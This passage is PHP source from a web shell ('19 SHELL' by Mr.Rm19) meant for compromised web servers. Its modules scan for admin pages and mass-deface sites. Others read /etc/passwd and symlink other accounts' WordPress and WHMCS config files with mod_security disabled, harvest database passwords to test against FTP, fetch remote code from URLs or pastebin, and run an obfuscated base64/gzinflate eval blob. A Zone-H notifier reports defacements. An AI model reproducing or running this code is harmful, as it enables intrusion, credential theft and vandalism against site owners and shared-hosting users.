794 'adminarea/index.php','adminarea/admin.php','adminarea/login.php','panel-administracion/index.php',
795 'panel-administracion/admin.php','modelsearch/index.php','modelsearch/admin.php','admincontrol/login.php',
796 'adm/admloginuser.php','admloginuser.php','admin2.php','admin2/login.php','admin2/index.php','usuarios/login.php',
797 'adm/index.php','adm.php','affiliate.php','adm_auth.php','memberadmin.php','administratorlogin.php','admin.asp','admin/admin.asp',
798 'admin_area/admin.asp','admin_area/login.asp','admin_area/index.asp','bb-admin/index.asp','bb-admin/login.asp',
799 'bb-admin/admin.asp','pages/admin/admin-login.asp','admin/admin-login.asp','admin-login.asp','user.asp','webadmin/index.asp',
800 'webadmin/admin.asp','webadmin/login.asp','admin/admin_login.asp','admin_login.asp','panel-administracion/login.asp',
801 'adminLogin.asp','admin/adminLogin.asp','home.asp','adminarea/index.asp','adminarea/admin.asp','adminarea/login.asp',
802 'panel-administracion/index.asp','panel-administracion/admin.asp','modelsearch/index.asp','modelsearch/admin.asp',
803 'admincontrol/login.asp','adm/admloginuser.asp','admloginuser.asp','admin2/login.asp','admin2/index.asp','adm/index.asp',
804 'adm.asp','affiliate.asp','adm_auth.asp','memberadmin.asp','administratorlogin.asp','siteadmin/login.asp','siteadmin/index.asp');
805 foreach($trying as $sec)
806 {
807 $urll=$url.'/'.$sec;
808 if(urlExist($urll))
809 {
810 echo '<p align="center"><font color="00FF00">[+] FOUND!! --> <a href="'.$urll.'" target="_blank">'.$urll.'</a></font></p>';
811 exit;
812 }
813 else
814 {
815 echo '<p align="center"><font color="#eee">[-] NOT FOUND --> '.$urll.'</font></p>';
816 }
817 }
818 echo 'Could not find admin page.[!]';
819 }
820 else
821 {
822 echo '<p>Invalid URL entered.[!]</p>';
823 }
824 }
825
826}elseif (isset($_GET['massdeface'])) {
827 echo'<center>
828 <h3> : Mass deface :</h3>
829 <small> by indoXploit </small>';
830 function sabun_massal($dir,$namafile,$isi_script) {
831 if(is_writable($dir)) {
832 $dira = scandir($dir);
833 foreach($dira as $dirb) {
834 $dirc = "$dir/$dirb";
835 $lokasi = $dirc.'/'.$namafile;
836 if($dirb === '.') {
837 file_put_contents($lokasi, $isi_script);
838 } elseif($dirb === '..') {
839 file_put_contents($lokasi, $isi_script);
840 } else {
841 if(is_dir($dirc)) {
842 if(is_writable($dirc)) {
843 echo "[<font color=lime>DONE</font>] $lokasi<br>";
844 file_put_contents($lokasi, $isi_script);
845 $idx = sabun_massal($dirc,$namafile,$isi_script);
846 }
847 }
848 }
849 }
850 }
851 }
852 function sabun_biasa($dir,$namafile,$isi_script) {
853 if(is_writable($dir)) {
854 $dira = scandir($dir);
855 foreach($dira as $dirb) {
856 $dirc = "$dir/$dirb";
857 $lokasi = $dirc.'/'.$namafile;
858 if($dirb === '.') {
859 file_put_contents($lokasi, $isi_script);
860 } elseif($dirb === '..') {
861 file_put_contents($lokasi, $isi_script);
862 } else {
863 if(is_dir($dirc)) {
864 if(is_writable($dirc)) {
865 echo "[<font color=lime>DONE</font>] $dirb/$namafile<br>";
866 file_put_contents($lokasi, $isi_script);
867 }
868 }
869 }
870 }
871 }
872 }
873 if($_POST['start']) {
874 if($_POST['tipe_sabun'] == 'mahal') {
875 echo "<div style='margin: 5px auto; padding: 5px'>";
876 sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
877 echo "</div>";
878 } elseif($_POST['tipe_sabun'] == 'murah') {
879 echo "<div style='margin: 5px auto; padding: 5px'>";
880 sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
881 echo "</div>";
882 }
883 } else {
884 echo "<center>";
885 echo "<form method='post'>
886 <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
887 <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
888 <font style='text-decoration: underline;'>Folder:</font><br>
889 <input type='text' name='d_dir' value='$_GET[massdeface]' style='width: 450px;' height='10'><br>
890 <font style='text-decoration: underline;'>Filename:</font><br>
891 <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
892 <font style='text-decoration: underline;'>Index File:</font><br>
893 <textarea name='script' style='width: 450px; height: 200px;'>Mr.Rm19</textarea><br>
894 <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
895 </form></center>";
896 }
897}elseif (isset($_GET['conf'])) {
898
899error_reporting(0);
900?>
901<form method=post>
902<center>
903<textarea type=hidden name=user><?php if(!file("/etc/passwd")){ echo"/etc/passwd gak adda";}else{ echo file_get_contents('/etc/passwd');}?></textarea><br><br>
904<input type=submit name=su value="GO GO GO!!"></form>
905</center><?php
906
907if(isset($_POST['su']))
908 {
909 mkdir('1945~',0777);
910 $r = " \nOptions Indexes FollowSymLinks \nForceType text/plain \nAddType text/plain .php \nAddType text/plain .html \nAddType text/html .shtml \nAddType txt .php \nAddHandler server-parsed .php \nAddHandler server-parsed .shtml \nAddHandler txt .php \nAddHandler txt .html \nAddHandler txt .shtml \nOptions All \n<IfModule mod_security.c> \nSecFilterEngine Off \nSecFilterScanPOST Off \nSecFilterCheckURLEncoding Off \nSecFilterCheckCookieFormat Off \nSecFilterCheckUnicodeEncoding Off \nSecFilterNormalizeCookies Off \n</IfModule>";
911$f = fopen('19~/.htaccess','w');
912fwrite($f,$r);
913echo "<br><center><b><i><a href=19~>TOUCH ME SENPAI</a></i></b></center>";
914$usr=explode("\n",$_POST['user']);
915foreach($usr as $uss)
916{
917 $us=trim($uss);
918$r="1945~/";
919symlink('/home/'.$us.'/public_html/wp-config.php',$r.$us.'..wp-config');
920symlink('/home/'.$us.'/public_html/configuration.php',$r.$us.'..joomla-or-whmcs');symlink('/home/'.$us.'/public_html/blog/wp-config.php',$r.$us.'..wp-config');
921symlink('/home/'.$us.'/public_html/blog/configuration.php',$r.$us.'..joomla');symlink('/home/'.$us.'/public_html/wp/wp-config.php',$r.$us.'..wp-config');
922symlink('/home/'.$us.'/public_html/wordpress/wp-congig.php',$r.$us.'..wordpress');symlink('/home/'.$us.'/public_html/config.php',$r.$us.'..config');
923symlink('/home/'.$us.'/public_html/whmcs/configuration.php',$r.$us.'..whmcs');
924symlink('/home/'.$us.'/public_html/support/configuration.php',$r.$us.'..supporwhmcs');
925symlink('/home/'.$us.'/public_html/secure/configuration.php',$r.$us.'..securewhmcs');
926symlink('/home/'.$us.'/public_html/clients/configuration.php',$r.$us.'..whmcs-clients');
927symlink('/home/'.$us.'/public_html/client/configuration.php',$r.$us.'..whmcs-client');
928symlink('/home/'.$us.'/public_html/billing/configuration.php',$r.$us.'..whmcs-billing');
929symlink('/home/'.$us.'/public_html/admin/config.php',$r.$us.'..admin-config');
930}
931echo'<center>berhasil!! <a href="19~" target="_blank">touch me senpai..</a></center>';
932}
933}elseif (isset($_GET['ctools'])) {
934 echo'
935<center>
936<h3>: Create Your Tools :</h3>
937<p><font color=white> NB : Tools ini akan mengambil script dari URL format .txt atau dari pastebin</font></p>
938 <form method="post">
939 <table><tr>
940 <th colspan=2>Import from</th>
941 </tr><tr><td>
942 URL : </td><td><input type="text" name="url" placeholder="http://site.com/1.txt" style="width:200px"></td></tr><tr>
943 <td>
944 PASTEBIN :</td><td><input type="text" name="pastebin" placeholder="4hIh93nJ" style="width:200px"></td></tr>
945<tr><td>save as:</td><td><input type="text" name="pname" value="'.$_GET['ctools'].'/mytools.php" style="width:200px" required></td></tr>
946<tr><th colspan=2>
947 <input type="submit" value="create!" name="ctools"></th></tr>
948 </table>
949 </form>';
950if(isset($_POST['ctools'])){
951 if(!empty($_POST['url'])){
952 $st=file_get_contents(htmlspecialchars($_POST['url']));
953 $fp=fopen($_POST['pname'],'w');
954 if(fwrite($fp,$st)){
955 echo "done!! --> <a href='?act=".$_GET['act']."&src=".$_POST['pname']."' target='_blank'>click here</a>";
956 }
957 fclose($fp);
958 }else{
959 if(!empty($_POST['pastebin'])){
960 $st=file_get_contents(htmlspecialchars("http://pastebin.com/raw/".$_POST['pastebin']));
961 $fp=fopen($_POST['pname'],'w');
962 if(fwrite($fp,$st)){
963 echo "done!! --> <a href='?act=".$_GET['act']."&src=".$_POST['pname']."' target='_blank'>click here</a>";
964 }
965 fclose($fp);
966 }
967}
968}
969}elseif (isset($_GET['stringtools'])) {
970 echo' <center>
971 <h3>: String Tools :</h3>
972 [<a href="?act='.$_GET['act'].'&replace='.$_GET['stringtools'].'">Auto replace String</a>]<br>
973 <font color=white> NB : tools ini adalah perbaikan dari enc0de dec0de script dan saya tambahkan coventer</font>
974 <br>
975<form method="post">
976<textarea name="e" style="width:77%;height:300px" class="form-control" placeholder="input string here [!]">
977</textarea><br><br>
978
979 <select name="opt" class="form-control" style="width:70%">
980 <optgroup label="Converter">
981 <option value="dechex">Decimal to Hexa</option> <option value="hexdec">Hexa to Decimal</option>
982<option value="decoct">Decimal to Octa</option>
983<option value="octdec">Octa to Decimal</option>
984 <option value="decbin">Decimal to Binary</option>
985 <option value="bindec">Binary to Decimal</option>
986 <option value="hexbin">Hexa to Binary</option>
987<option value="binhex">Binary to Hexa</option>
988</optgroup><optgroup label="encode&decode">
989 <option value="url">URL</option> <option value="base64">base64</option>
990<option value="urlbase64">URL - base64</option>
991<option value="cuu">Convert_uu</option>
992<option value="sgzcuus64">str_rot13 - gzinflate - convert_uu - str_rot13 - base64 </option>
993<option value="gz64">gzinflate - base64</option>
994 <option value="sgz64">str_rot13 - gzinflate - base64</option>
995 <option value="s64">str_rot13 - gzinflate - str_rot13 - base64</option>
996<option value="sb64">str_rot13 - base64 </option>
997 <option value="64url">URL - base64</option>
998<option value="64u64u">URL - base64 - url - base64</option>
999<option value="ss64"> base64 - str_rot13 - str_rot13</option>
1000</optgroup>
1001 </select>
1002 <br>
1003<input type="submit" value="Convert!" name="c" class="btn btn-success btn-sm">
1004<input type="submit" value="enc0de" name="en" class="btn btn-primary btn-sm">
1005<input type="submit" value="dec0de" name="de" class="btn btn-danger btn-sm">
1006</form>
1007
1008 ';
1009 $a = $_POST['e'];
1010 $o = $_POST['opt'];
1011 if(isset($_POST['c'])){
1012 switch($o){
1013 case'dechex';
1014 $s= dechex($a);
1015 break;
1016 case'dechex';
1017 $s= hexdec($a);
1018 break;
1019 case'decoct';
1020 $s= decoct($a);
1021 break;
1022 case'octdec';
1023 $s= octdec($a);
1024 break;
1025 case'decbin';
1026 $s= decbin($a);
1027 break;
1028 case'bindec';
1029 $s= bindec($a);
1030 break;
1031 case'hexbin';
1032 $s= hex2bin($a);
1033 break;
1034 case'binhex';
1035 $s= bin2hex($a);
1036 break;
1037 }
1038echo'<br>:: OutPut ::<br><textarea style="width:77%;height:300px ">'.$s.'</textarea>';
1039 }elseif(isset($_POST['en'])){
1040 switch($o){
1041 case'url';
1042 $r=urlencode($a);
1043 break;
1044 case'base64';
1045 $r=base64_encode($a);
1046 break;
1047 case'urlbase64';
1048 $r=urlencode(base64_encode($a));
1049 break;
1050 case'gz64';
1051 $r=base64_encode(gzdeflate($a));
1052
1053 break;
1054 case'sgz64';
1055 $r=base64_encode(gzdeflate(str_rot13($a)));
1056 break;
1057 case's64';
1058 $r=(base64_encode(str_rot13(gzdeflate(str_rot13($a)))));
1059 break;
1060 case'sb64';
1061 $r=base64_encode(str_rot13($a));
1062 break;
1063 case'64url';
1064 $r=base64_encode(urlencode($a));
1065 break;
1066 case'64u64u';
1067 $r=base64_encode(urlencode(base64_encode(urlencode($a))));
1068 break;
1069 case'cuu';
1070 $r=convert_uuencode($a);
1071 break;
1072 case'sgzcuus64';
1073 $r=base64_encode(str_rot13(convert_uuencode(gzdeflate(str_rot13($a)))));
1074 break;
1075 case'ss64';
1076 $r=str_rot13(str_rot13(base64_encode($a)));
1077 break;
1078 }
1079 echo'<br>:: OutPut::<br><textarea style="width:77%;height:300px" >'.$r.'</textarea>';
1080
1081 }
1082//Dec0de
1083 if(isset($_POST['de'])){
1084 switch($o){
1085 case'url';
1086 $r=urldecode($a);
1087 break;
1088 case'base64';
1089 $r=base64_decode($a);
1090 break;
1091 case'urlbase64';
1092 $r=base64_decode(urldecode($a));
1093 break;
1094 case'gz64';
1095 $r=gzinflate(base64_decode($a));
1096
1097 break;
1098 case'sgz64';
1099 $r=str_rot13(gzinflate(base64_decode($a)));
1100 break;
1101 case's64';
1102 $r=str_rot13(gzinflate(str_rot13(base64_decode($a))));
1103 break;
1104 case'sb64';
1105 $r=str_rot13(base64_decode($a));
1106 break;
1107 case'64url';
1108 $r=urldecode(base64_decode($a));
1109 break;
1110 case'64u64u';
1111 $r=urldecode(base64_decode(urldecode(base64_decode($a))));
1112 break;
1113 case'cuu';
1114 $r=convert_uudecode($a);
1115 break;
1116 case'sgzcuus64';
1117 $r=str_rot13(gzinflate(convert_uudecode(str_rot13(base64_decode($a)))));
1118 break;
1119 case'ss64';
1120 $r=base64_decode(str_rot13(str_rot13($a)));
1121 }
1122 $rx = htmlspecialchars($r);
1123 echo'<br>:: OutPut::<br><textarea style="width:77%;height:300px" >'.$rx.'</textarea>';
1124
1125 }
1126
1127}elseif (isset($_GET['about'])) {
1128 ?>
1129<center>
1130<h2 style="font-family:courier;">19 SHELL <br>
1131<small style="border-bottom:1px solid #fff;"> Mr.Rm19</small></h2>
1132<img src="https://cdn-cms.f-static.com/uploads/732031/800_59f4de130b999.jpg" width="500" height="300">
1133<br>
1134<table>
1135<tr><td>Assalamualaikum Wr Wb</td><td>
1136<marquee scrollamount=5><i><b><font color=white>
1137 </marquee></td></tr></table>
1138<h3 style="text-shadow:2px 3px 3px #fff;"> 19 shell ~ Mr.Rm19</h3>
1139<p>SHELL SPESIAL BY Mr.Rm19!!!! <br> </p>
1140<pre>
1141facebook me >></font> [<a href='https://facebook.com/c0d3c0d3c0d3' target='_blank'>Mr.Rm19</a>] atau >> [<a href='https://shafou.com' target='_blank'>Gans</a>]
1142
1143 <?php
1144}elseif (isset($_GET['unzip'])) {
1145echo'
1146<center>
1147<h3>: Unzip Files :</h3>
1148<br>
1149<table border=1>
1150<tr><td>file zip</td><td>Target Dir</td>
1151</tr>
1152<tr><td>
1153<form method="post">
1154<input type="text" name="filezip" value="'.$_GET['unzip'].'/file.zip" >
1155</td><td>
1156<input type="text" name="dirzip" value="'.$_GET['unzip'].'/" >
1157</td></tr>
1158</table>
1159<input type="submit" name="ext" value="unzip!!">
1160</form>';
1161
1162if(isset($_POST['ext'])){
1163 $zip = new ZipArchive;
1164$res = $zip->open($_POST['filezip']);
1165
1166if ($res === TRUE) {
1167
1168$zip->extractTo($_POST['dirzip']);
1169
1170$zip->close();
1171 echo "<br>DONE..!! extracted !";
1172 } else {
1173
1174echo "failed";
1175 }
1176}
1177}elseif (isset($_GET['download'])) {
1178 ob_clean();
1179 $dunlut = $_GET['download'];
1180 header('Content-Description: File Transfer');
1181 header('Content-Type: application/octet-stream');
1182 header('Content-Disposition: attachment; filename="'.basename($dunlut).'"');
1183 header('Expires: 0');
1184 header('Cache-Control: must-revalidate');
1185 header('Pragma: public');
1186 header('Content-Length: ' . filesize($dunlut));
1187 readfile($dunlut);
1188 exit;
1189
1190}elseif (isset($_GET['mail'])) {
1191 $e=function_exists('mail');
1192 if($e){
1193 echo "
1194 <center>
1195 <h3>: mail sender :</h3>
1196 <br>
1197 <form method='post' >
1198 <table border=1>
1199 <tr>
1200 <td>from :</td><td><input type='text' name='from' value='Mr.Rm19' ></td></tr>
1201 <tr><td>For:</td><td><input type='text' name='for' value='admin@".$_SERVER['HTTP_HOST']."'></td></tr>
1202 <tr><td>Subject:</td><td><input type='text' name='subject' value='patch ur site!' ></td></tr>
1203 </table>
1204 <textarea name='cont' style='width:500px;height:300px'>please..patch ur face! ur face is bad :p </textarea>
1205 <br>
1206 <input type='submit' name='sent' value='send!!' >
1207 </form>";
1208
1209}else{
1210 echo" mail() function does not exists in this website!";
1211}
1212if(isset($_POST['sent'])){
1213 if(mail($_POST['for'],$_POST['subject'],$_POST['cont'],$_POST['from'])){
1214 echo "send!!".$_POST['for'];
1215 }else{
1216 echo"failed !!!";
1217 }
1218}
1219}elseif (isset($_GET['kuchiyose'])) {
1220echo "
1221<center>
1222<h3>: Kuchiyose No Jutsu :</h3>
1223<br>
1224<p><font color=white>NB : Jika ada error/script tidak muncul ,ganti IP mu atau pake anonymoX<br>
1225(saran IP USA ) </font></p>
1226<table><tr><td>
1227<pre style='text-align:left;'>
1228 [<a href='?act=".$_GET['act']."&kuchiyose=wso'>WSO shell</a>]
1229 [<a href='?act=".$_GET['act']."&kuchiyose=jkt48'>JKT48 priv8 shell</a>]
1230 [<a href='?act=".$_GET['act']."&kuchiyose=bejak'>b374k shell</a>]
1231 [<a href='?act=".$_GET['act']."&kuchiyose=indoxploit_shell'>indoXploit shell</a>]
1232 [<a href='?act=".$_GET['act']."&kuchiyose=andela'>andela priv8 shell</a>]
1233 [<a href='?act=".$_GET['act']."&kuchiyose=injection'>1n73ction shell </a>]
1234 [<a href='?act=".$_GET['act']."&kuchiyose=sbh'>Surabaya BlackHat shell </a>]
1235 [<a href='?act=".$_GET['act']."&kuchiyose=bh'>BlackHat shell</a>]
1236 [<a href='?act=".$_GET['act']."&kuchiyose=c99'>C99 shell</a>]
1237 [<a href='?act=".$_GET['act']."&kuchiyose=r57'>r57 shell</a>]
1238 [<a href='?act=".$_GET['act']."&kuchiyose=adminer'>adminer</a>]
1239 [<a href='?act=".$_GET['act']."&kuchiyose=terminal'>terminal</a>]
1240 [<a href='?act=".$_GET['act']."&kuchiyose=root'>ByPass R00t Path</a>]
1241 [<a href='?act=".$_GET['act']."&kuchiyose=pastebin'>Pastebin auto post</a>]
1242 [<a href='?act=".$_GET['act']."&kuchiyose=whmcs'>WHMCS killer</a>]
1243 [<a href='?act=".$_GET['act']."&kuchiyose=bypass_shell'>Bypass Shell To .JPG Files</a>]
1244</pre>
1245</td><td>
1246<img src='https://cdn-cms.f-static.com/uploads/732031/800_59f4de130b999.jpg' width='100%' height='100%'>
1247</td></tr>
1248</table>
1249<br><br>
1250<p><b><i><font color=white>MOHON MAAF JIKA SAYA NEMCANTUMKAN SCRIPT ANDA TANPA IJIN :V </font></b></i></p>";
1251}elseif (isset($_GET['cpbrute'])) {
1252 echo '';
1253 ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>');
1254 set_time_limit(0);
1255
1256 @$passwd = fopen('/etc/passwd','r');
1257 if (!$passwd) { die('<b>[-] Error : coudn`t read /etc/passwd</b>'); }
1258 $pub = array();
1259 $users = array();
1260 $conf = array();
1261 $i = 0;
1262 while(!feof($passwd))
1263 {
1264 $str = fgets($passwd);
1265 if ($i > 35)
1266 {
1267 $pos = strpos($str,':');
1268 $username = substr($str,0,$pos);
1269 $dirz = '/home/'.$username.'/public_html/';
1270 if (($username != ''))
1271 {
1272 if (is_readable($dirz))
1273 {
1274 array_push($users,$username);
1275 array_push($pub,$dirz);
1276 }
1277 }
1278 }
1279 $i++;
1280 }
1281
1282 echo '<h3>: cPanel bruteForce</h3>
1283 <br>
1284 <br>
1285 <center>
1286 <textarea>';
1287 echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n";
1288 echo "[+] Founded ".sizeof($pub)." readable public_html directories\n";
1289 echo "[~] Searching for passwords in config files...\n\n";
1290 foreach ($users as $user)
1291 {
1292 $path = "/home/$user/public_html/";
1293 read_dir($path,$user);
1294 }
1295 echo "\n[+] Done !\n";
1296 function read_dir($path,$username)
1297 {
1298 if ($handle = opendir($path))
1299 {
1300 while (false !== ($file = readdir($handle)))
1301 {
1302 $fpath = "$path$file";
1303 if (($file != '.') and ($file != '..'))
1304 {
1305 if (is_readable($fpath))
1306 {
1307 $dr = $fpath."/";
1308 if (is_dir($dr))
1309 {
1310 read_dir($dr,$username);
1311 }
1312 else
1313 {
1314 if (
1315 ($file=='config.php')
1316 or ($file=='config.inc.php')
1317 or ($file=='conf.php')
1318 or ($file=='settings.php')
1319 or ($file=='configuration.php')
1320 or ($file=='wp_config.php')
1321 or ($file=='wp-config.php')
1322 or ($file=='inc.php')
1323 or ($file=='setup.php')
1324 or ($file=='dbconf.php')
1325 or ($file=='dbconfig.php')
1326 or ($file=='db.inc.php')
1327 or ($file=='dbconnect.php')
1328 or ($file=='connect.php')
1329 or ($file=='common.php')
1330 or ($file=='config_global.php')
1331 or ($file=='db.php')
1332 or ($file=='connect.inc.php')
1333 or ($file=='e107_config.php')
1334 or ($file=='dbconnect.inc.php'))
1335 {
1336 $pass = get_pass($fpath);
1337 if ($pass != '')
1338 {
1339 echo "[+] $fpath\n$pass\n";
1340 ftp_check($username,$pass);
1341 }
1342 }
1343 }
1344 }
1345 }
1346 }
1347 }
1348 }
1349 function get_pass($link)
1350 {
1351 @$config = fopen($link,'r');
1352 while(!feof($config))
1353 {
1354 $line = fgets($config);
1355 if (strstr($line,'pass')
1356 or strstr($line,'pwd')
1357 or strstr($line,'db_pass')
1358 or strstr($line,'dbpass')
1359 or strstr($line,'passwd'))
1360 {
1361 if (strrpos($line,'"'))
1362 {
1363 preg_match("/(.*)[^=]\"(.*)\"/",$line,$pass);
1364 $pass = str_replace("]=\"","",$pass);
1365 }
1366
1367 else
1368 preg_match("/(.*)[^=]\'(.*)\'/",$line,$pass);
1369 $pass = str_replace("]='","",$pass);
1370 return $pass[2];
1371 }
1372 }
1373 }
1374 function ftp_check($login,$pass)
1375 {
1376 @$ftp = ftp_connect('127.0.0.1');
1377 if ($ftp)
1378 {
1379 @$res = ftp_login($ftp,$login,$pass);
1380 if ($res)
1381 {
1382 echo '[FTP] '.$login.':'.$pass." Success !\n\n";
1383
1384 eval(gzinflate(base64_decode('rVPBbtswDL0b8D9ohoEmgFtUzmVo1qHDkC49rDPiZId2RaDITOrVEQ3JQdEN+6D95UTJSbHB2cnxQeIj3yMjknGBW1EqdsniZT6ZfZ3M7k+m83m2nH7J5ycP4zCI65Rbd8r9PaV76u/nb51lD7Kld64NyiesQQ1ir50QK4lBa4XuMI1O+Pmw5fBjHH6c4xN3sqyrm0dfuR68cXUOw+BnLPhlNNEadTT+FQZQGdij+U5KMCYar2WFBgaeQ1GvGtxrpJ0aabcG/0fDFutVRp0qo24VYnkd6oKxzYvC4LSv3zcVBh9roaBii7oQDbAbtUZ2X+MzaCjY6oV9WtzcTnI2A4kFEPBZmKflVmxKWQp1xx4YifRa0RRNwy5Y22hCFgY0IRVuPJAJYwio7dl7/g+2DXXDMtSN+3N5PrW5nGknhpDrefaKpITIzL3iARz1XtVvu3yct/1I/urCD5v10LCZHZ2VUEXZ3PVcQ0Qb2aDdxkiozaYEgVpcvYhHxDOJW+fWIMv6vxFmt/oOsqGY9tHovU3eTqCLeQRRgDYUc61xe8F2zvdOwbO5kvWpN89KO6zviWDnpBrY0pK9ekK7kux1hocQV97RqD8=')));
1385
1386 echo '[SSH] Port' .':' .$a1. " !\n\n";
1387 echo '[FTP] Port' .':' .$a2. " !\n\n";
1388 echo '[cPanel] Port' .':' .$a3. " !\n\n";
1389
1390 }
1391 else ftp_quit($ftp);
1392 }
1393 }
1394 echo '</textarea><br><br><b>BruteForce Completed ...</b>';
1395}elseif (isset($_GET['copy'])) {
1396echo'
1397<center>
1398<h3>: copy file :</h3>
1399<br>
1400<form method="post">
1401file :<input type="text" name="copy" value="'.$_GET['act'].'" style="width:200px"> copy to:
1402<input type="text" name="copied" value="'.$_GET['act'].'/copy-" style="width:200px">
1403<input type="submit" name="cop" value=">>">
1404</form>';
1405if(isset($_POST['cop'])){
1406 if(copy($_POST['copy'],$_POST['copied'])){
1407 echo" done!! copied! <a href='?act=".$_GET['act']."&src=".$_POST['copied']."'>".$_POST['copied']."</a>";
1408 }
1409}
1410}elseif ($_GET['act']=='logout') {
1411 session_destroy();
1412 echo'<script>
1413 alert("bye.. !!!!!!!!");
1414 window.location.href="?";
1415 </script>';
1416}elseif (isset($_GET['phpinfo'])) {
1417 phpinfo();
1418}elseif (isset($_GET['zoneh'])) {
1419?>
1420<center>
1421<h3>: Zone-H Mass Notifer :</h3>
1422</center>
1423<form method="post">
1424<center>
1425<input type="text" name="depecer" style="width:500px" placeholder="nick hacker lu ">
1426<br>
1427<textarea name="url" placeholder="http://ngentot lu anjing" style="width:500px;height:300px;"></textarea><br>
1428<input type="submit" name="go" value="subMitt" >
1429</form>
1430<?php
1431$url = explode("\r\n", $_POST['url']);
1432$go = $_POST['go'];
1433function kirim($target,$hacker) {
1434 $ch = curl_init();
1435 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
1436 curl_setopt($ch, CURLOPT_URL, "http://zone-h.org/notify/single");
1437 curl_setopt($ch, CURLOPT_POST, true);
1438 curl_setopt($ch, CURLOPT_POSTFIELDS, array(
1439 "defacer" => $hacker,
1440 "domain1" => $target,
1441 "hackmode" => "1",
1442 "reason" => "1",
1443 ));
1444 $res = curl_exec($ch);
1445 curl_close($ch);
1446 return preg_match("/<font color=\"red\">OK<\/font><\/li>/", $res);
1447}
1448if($go) {
1449 foreach($url as $sites) {
1450 if(kirim($sites,$_POST['depecer'])) {
1451 echo "<br>[ OK ] => $sites <br>";
1452 } else {
1453 echo "<br>[ ERROR ] => $sites <br>";
1454 }
1455 }
1456}
1457
1458}elseif($_GET['mobile']){
1459 if(!$_SESSION['responsive']){
1460$_SESSION['responsive']="<meta name='viewport' content='width=device-width,inintial-scale=1'>";
1461}else{
1462echo $_SESSION['responsive'];
1463}
1464}elseif($_GET['mobile_off']){
1465unset($_SESSION['responsive']);
1466echo"<script>
1467alert('mode responsive :OFF');
1468window.location.href='?responsive=off';
1469</script>";
1470
1471}elseif($_GET['theme']){
1472 ?>
1473 <br><br>
1474 <center>
1475 <h1>.:: change theme and become more comfortable ::.</h1>
1476 <small>c0ded by Mr.Rm19</small>
1477
1478 <br><br>
1479 <table class="tbl_exp" border=1><thead id="thead">
1480 <th>FONT SIZE</th><th>FONT COLOR</th><th>PUBLIC FONT COLOR</th><th>BACKGROUND</th><th>REPONSIVE MODE</th></thead>
1481 <tbody>
1482 <tr><td>
1483 <form method="post">
1484 <input type="number" name="fz" value="<?=$fz;?>"><input type="submit" name="submitfz" value=">>"></form></td><td>
1485 <form method="post">
1486<input type="color" name="color" value="<?=$col;?>"><input type="submit" name="submitcol" value=">>"></form></td><td>
1487<form method="post">
1488<input type="color" name="pcolor" value="<?=$pcol;?>"><input type="submit" name="submitpc" value=">>"></form></td><td>
1489<form method="post">
1490<input type="color" name="bgcolor" value="<?=$bg;?>"><input type="text" value="<?=$bg;?>" name="bgcolor"><input type="submit" name="submitbg" value=">>"></form></td><td><?php echo $resmod;?></td></tr></tbody></table>
1491<h3>[<a href='?act=<?=$d;?>&reset=<?=$d;?>'>DEFAULT THEMES</a>]</h3>
1492</center>
1493<pre>
1494
1495FONT SIZE : mengubah ukuran font(tulisan) ,semakin besar angka semakin besar pula ukuran font.
1496FONT COLOR : mengubah warna font (bukan link).
1497PUBLIC FONT COLOR : mengubah semua warna font(termasuk link).
1498BACKGROUND : mengubah warna background atau bisa dengan gambar di isi dengan :
1499 ex : url('http://google.com/gambar.jpg')
1500REPONSIVE MODE : mode saat menyesuaikan ukuran layar pengguna.
1501
1502</pre>
1503<?php
1504}elseif($_GET['reset']){
1505unset($_SESSION['fz']);
1506unset($_SESSION['col']);
1507unset($_SESSION['pcol']);
1508unset($_SESSION['bg']);
1509echo "<script>window.location.href='?'</script>";
1510}elseif (isset($_GET['replace'])) {
1511 echo"
1512 <center>
1513 <h3>: auto replace string :</h3>
1514 <P>NB : gunakan otak kalian ! </p>
1515 <br>
1516 <form method='post'>
1517 <input type='submit' name='sstr' value='replace all'>
1518 <table style='border-collapse:collapse;border:1px solid #eee;' border=1><tr><td>
1519 <textarea name='str' style='width:600px;height:200px;' required>Your string here / string anda sini</textarea></td><td>
1520 <textarea name='str2' style='width:600px;height:200px;' required>string will u replace / string yang ingin anda ganti</textarea></td></tr>
1521 <tr><td>
1522 <textarea name='str3' style='width:600px;height:200px;' required>string replace /ganti string</textarea></td><td>
1523 <form>";
1524 if(isset($_POST['sstr'])){
1525 $rep=str_replace($_POST['str2'],$_POST['str3'],$_POST['str']);
1526 if($rep){
1527 echo'
1528 <textarea style="width:600px;height:200px;">'.$rep.'</textarea></td></tr></table>';
1529 }
1530 }
1531}
1532}else{
1533 ?>
1534<table class="tbl_exp" border='1'>
1535<tr id="thead">
1536<th>No</th><th>^</th><th>Name</th><th>Permission</th><th>Size</th><th>Last Modified</th><th>action</th>
1537</tr>
1538
1539<?php
1540if(isset($_GET['45'])){
1541$d=$_GET['45'];
1542}else{
1543$d=getcwd();
1544}
1545$d=str_replace('\\','/',$d);
1546$sdir=scandir($d);
1547$no=1;
1548echo'
1549<form method="post">
1550<tr class="hover">
1551
1552 <td style="width:25px;max-width:48px;">-</td><td style="width:20px">^</td><td style="width:20%;max-width:500px;">
1553 <--[<a href="?45='.dirname($d).'">..</a>]</td><td>--</td><td>--</td><td>--</td><td>[<a href="?act='.$d.'&upload='.$d.'/'.$dir.'">upload</a>][<a href="?act='.$d.'&mkdir='.$d.'/'.$dir.'">newdir</a>][<a href="?act='.$d.'&newfile='.$d.'/'.$dir.'">newfile</a>]</td></tr>';
1554foreach ($sdir as $dir) {
1555 if(!is_dir("$d/$dir")||$dir=='.'||$dir=='..')continue;
1556 echo'
1557
1558 <tr class="hover">
1559 <td>'.$no++.'</td><td>
1560<input type="checkbox" name="cekd[]" value="'.$d.'/'.$dir.'" style="background:transparent;color: #fff;border: 1px solid #fff;">
1561</td>
1562 <td style="width:20%;max-width:500px;">'.icon_folder.'
1563 [<a href="?45='.$d.'/'.$dir.'">'.substr($dir,0,40).'</a>]</td>
